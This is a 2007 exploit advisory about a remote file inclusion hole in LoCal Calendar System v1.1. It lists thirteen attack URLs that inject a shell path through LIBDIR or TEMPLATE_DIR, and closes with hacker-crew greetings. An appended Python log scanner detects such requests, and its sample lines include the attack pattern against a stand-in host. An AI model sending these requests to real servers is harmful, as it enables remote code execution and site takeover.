Computer Security
[EN] securityvulns.ru
From: trzindan_(at)_hotmail.fr <trzindan_(at)_hotmail.fr>
Date: 28.01.2007
Subject: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcStdLib.inc) Remote File Include

Tr_ZiNDaN

trzindan@hotmail.fr Turkey
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------

code :
require "$TEMPLATE_DIR/header.inc";
require("$LIBDIR/lcStdLib.inc");
require("$LIBDIR/lcUser.php");
require ("$LIBDIR/lcGroup.inc");
require("$LIBDIR/lcCal.inc");
require("$LIBDIR/Calendar.inc");
require("$LIBDIR/lcErrorChecker.inc");
include ("$TEMPLATE_DIR/navbar.php");
include("$TEMPLATE_DIR/footer.inc");
--------------------------------------------------------------------------------------------
exploit:

local/showinvoices.php?TEMPLATE_DIR=shell?
local/editevent.php?LIBDIR=shell?
local/resetpassword.php?LIBDIR=shell?
local/signup.php?LIBDIR=shell?
local/showmonth.php?TEMPLATE_DIR=shell?
local/showmonth.php?LIBDIR=shell?
local/showday.php?LIBDIR=shell?
local/showevents.php?LIBDIR=shell?
local/showevents.php?TEMPLATE_DIR=shell?
local/retrieveinvoice.php?TEMPLATE_DIR=shell?
local/modifyitem.php?TEMPLATE_DIR=shell?
local/lookup_userid.php?LIBDIR=shell?
local/lookup_userid.php?TEMPLATE_DIR=shell?

--------------------------------------------------------------------------
Thanx

str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm
Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy..


-------------------------------------------------------------------------

##---ALL MusLim Hackers---------------------------------------------------------------------
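
A detection check for the issue reported above, as an added example that is not part of the original advisory or of the LoCal code: it scans web server access-log lines for requests whose query string sets LIBDIR or TEMPLATE_DIR, the two variables the listed scripts use in require/include paths. The common/combined log format, the `month` parameter and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Variables the advisory shows inside require/include paths.
PATH_VARS = {"LIBDIR", "TEMPLATE_DIR"}
# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# Constructed log lines for illustration; addresses, hosts and values are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Jan/2007:10:00:01 +0000] "GET /local/showmonth.php?month=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Jan/2007:10:00:05 +0000] "GET /local/showmonth.php?TEMPLATE_DIR=http://example.invalid/a.txt? HTTP/1.1" 200 312',
    '198.51.100.7 - - [28/Jan/2007:10:00:09 +0000] "GET /local/signup.php?%4CIBDIR=http://example.invalid/a.txt? HTTP/1.1" 200 298',
    '192.0.2.11 - - [28/Jan/2007:10:00:12 +0000] "GET /local/showday.php?libdir_help=1 HTTP/1.1" 200 4801',
]

def suspicious_params(target):
    """Return the sorted path-variable names that a request target tries to set."""
    query = urlsplit(target).query
    hits = set()
    # parse_qsl percent-decodes names, so an encoded name such as %4CIBDIR is still caught.
    for name, _value in parse_qsl(query, keep_blank_values=True):
        # PHP also accepts array syntax (LIBDIR[]=...), so compare the base name.
        base = name.split("[", 1)[0]
        # PHP variable names are case-sensitive, so match the exact spelling.
        if base in PATH_VARS:
            hits.add(base)
    return sorted(hits)

def scan(lines):
    """Yield (client, target, params) for each log line that sets a path variable."""
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        params = suspicious_params(target)
        if params:
            yield line.split(" ", 1)[0], target, params

if __name__ == "__main__":
    for client, target, params in scan(SAMPLE_LOG):
        print(client, ",".join(params), target)
```

Access logs record only the query string, so the same names sent in a POST body or cookie are not covered by this check.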
